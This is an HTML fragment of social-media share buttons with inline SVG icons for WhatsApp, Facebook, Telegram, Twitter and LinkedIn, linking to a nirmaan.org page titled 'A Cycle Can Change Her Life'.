                    <path d="M224 122.8c-72.7 0-131.8 59.1-131.9 131.8 0 24.9 7 49.2 20.2 70.1l3.1 5-13.3 48.6 49.9-13.1 4.8 2.9c20.2 12 43.4 18.4 67.1 18.4h.1c72.6 0 133.3-59.1 133.3-131.8 0-35.2-15.2-68.3-40.1-93.2-25-25-58-38.7-93.2-38.7zm77.5 188.4c-3.3 9.3-19.1 17.7-26.7 18.8-12.6 1.9-22.4.9-47.5-9.9-39.7-17.2-65.7-57.2-67.7-59.8-2-2.6-16.2-21.5-16.2-41s10.2-29.1 13.9-33.1c3.6-4 7.9-5 10.6-5 2.6 0 5.3 0 7.6.1 2.4.1 5.7-.9 8.9 6.8 3.3 7.9 11.2 27.4 12.2 29.4s1.7 4.3.3 6.9c-7.6 15.2-15.7 14.6-11.6 21.6 15.3 26.3 30.6 35.4 53.9 47.1 4 2 6.3 1.7 8.6-1 2.3-2.6 9.9-11.6 12.5-15.5 2.6-4 5.3-3.3 8.9-2 3.6 1.3 23.1 10.9 27.1 12.9s6.6 3 7.6 4.6c.9 1.9.9 9.9-2.4 19.1zM400 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h352c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zM223.9 413.2c-26.6 0-52.7-6.7-75.8-19.3L64 416l22.5-82.2c-13.9-24-21.2-51.3-21.2-79.3C65.4 167.1 136.5 96 223.9 96c42.4 0 82.2 16.5 112.2 46.5 29.9 30 47.9 69.8 47.9 112.2 0 87.4-72.7 158.5-160.1 158.5z"></path>
                </svg><span class="mbview" style="font-size: small;  padding-left:15px;">WhatsApp</span>
            </a>



            <a style=" display: flex; align-items: center;" href="https://www.facebook.com/sharer/sharer.php?u=https://nirmaan.org/cycle/">
                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="2em" width="2em" xmlns="http://www.facebook.com/" style="color: blue;">
                    <path fill-rule="evenodd" d="M23.00025,0 L1.0005,0 C0.44775,0 0,0.44775 0,0.99975 L0,23.00025 
                        C0,23.55225 0.44775,24 1.0005,24 L12.75,24 
                        L12.75,15 L9.75,15 L9.75,11.25 L12.75,11.25 L12.75,8.25 C12.75,5.15025 14.71275,3.62475 17.478,3.62475 C18.8025,3.62475 19.941,3.72375 20.2725,3.76725 L20.2725,7.00725 L18.35475,7.008 C16.851,7.008 16.5,7.72275 16.5,8.77125 L16.5,11.25 L20.25,11.25 L19.5,15 L16.5,15 L16.56,24 L23.00025,24 C23.55225,24 24,23.55225 24,23.00025 L24,0.99975 C24,0.44775 23.55225,0 23.00025,0"></path>
                </svg><span class=" mbview" style="font-size: small; padding-left:15px;">Facebook</span>
            </a>

            <a href="https://t.me/share/url?url=https://nirmaan.org/cycle/&text=A Cycle Can Change Her Life" style=" display: flex; align-items: center;">
                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="2em" width="2em" xmlns="http://www.w3.org/2000/svg" style=" color:#00405d;">
                    <path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM8.287 5.906c-.778.324-2.334.994-4.666 2.01-.378.15-.577.298-.595.442-.03.243.275.339.69.47l.175.055c.408.133.958.288 1.243.294.26.006.549-.1.868-.32 2.179-1.471 3.304-2.214 3.374-2.23.05-.012.12-.026.166.016.047.041.042.12.037.141-.03.129-1.227 1.241-1.846 1.817-.193.18-.33.307-.358.336a8.154 8.154 0 0 1-.188.186c-.38.366-.664.64.015 1.088.327.216.589.393.85.571.284.194.568.387.936.629.093.06.183.125.27.187.331.236.63.448.997.414.214-.02.435-.22.547-.82.265-1.417.786-4.486.906-5.751a1.426 1.426 0 0 0-.013-.315.337.337 0 0 0-.114-.217.526.526 0 0 0-.31-.093c-.3.005-.763.166-2.984 1.09z"></path>
                </svg><span class="mbview" style="font-size: small;  padding-left:15px;">Telegram</span>
            </a>



            <a href="https://twitter.com/share?url=https://nirmaan.org/cycle/&text=A Cycle Can Change Her Life&via=[via]&hashtags=[hashtags]" style=" display: flex; align-items: center;">
                <svg stroke="currentColor" fill="currentColor" stroke-width="0" version="1.1" viewBox="0 0 16 16" height="2em" width="2em" xmlns="http://www.w3.org/2000/svg" style="color:	#55acee">
                    <path d="M16 3.538c-0.588 0.263-1.222 0.438-1.884 0.516 0.678-0.406 1.197-1.050 1.444-1.816-0.634 0.375-1.338 0.65-2.084 0.797-0.6-0.638-1.453-1.034-2.397-1.034-1.813 0-3.281 1.469-3.281 3.281 0 0.256 0.028 0.506 0.084 0.747-2.728-0.138-5.147-1.444-6.766-3.431-0.281 0.484-0.444 1.050-0.444 1.65 0 1.138 0.578 2.144 1.459 2.731-0.538-0.016-1.044-0.166-1.488-0.409 0 0.013 0 0.028 0 0.041 0 1.591 1.131 2.919 2.634 3.219-0.275 0.075-0.566 0.116-0.866 0.116-0.212 0-0.416-0.022-0.619-0.059 0.419 1.303 1.631 2.253 3.066 2.281-1.125 0.881-2.538 1.406-4.078 1.406-0.266 0-0.525-0.016-0.784-0.047 1.456 0.934 3.181 1.475 5.034 1.475 6.037 0 9.341-5.003 9.341-9.341 0-0.144-0.003-0.284-0.009-0.425 0.641-0.459 1.197-1.038 1.637-1.697z"></path>
                </svg><span class="mbview" style="font-size: small;  padding-left:15px;">Twitter</span>
            </a>




            <a href="https://www.linkedin.com/shareArticle?url=https://nirmaan.org/cycle/&title= A Cycle can Change Her Life" style=" display: flex; align-items: center;">
                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" height="2em" width="2em" xmlns="http://www.w3.org/2000/svg" style="color:	#0077b5">
                    <path d="M880 112H144c-17.7 0-32 14.3-32 32v736c0 17.7 14.3 32 32 32h736c17.7 0 32-14.3 32-32V144c0-17.7-14.3-32-32-32zM349.3 793.7H230.6V411.9h118.7v381.8zm-59.3-434a68.8 68.8 0 1 1 68.8-68.8c-.1 38-30.9 68.8-68.8 68.8zm503.7 434H675.1V608c0-44.3-.8-101.2-61.7-101.2-61.7 0-71.2 48.2-71.2 98v188.9H423.7V411.9h113.8v52.2h1.6c15.8-30 54.5-61.7 112.3-61.7 120.2 0 142.3 79.1 142.3 181.9v209.4z"></path>
                </svg><span class="mbview" style="font-size:small;  padding-left:15px;">Linkedin</span>
            </a>

        </div>
    </div>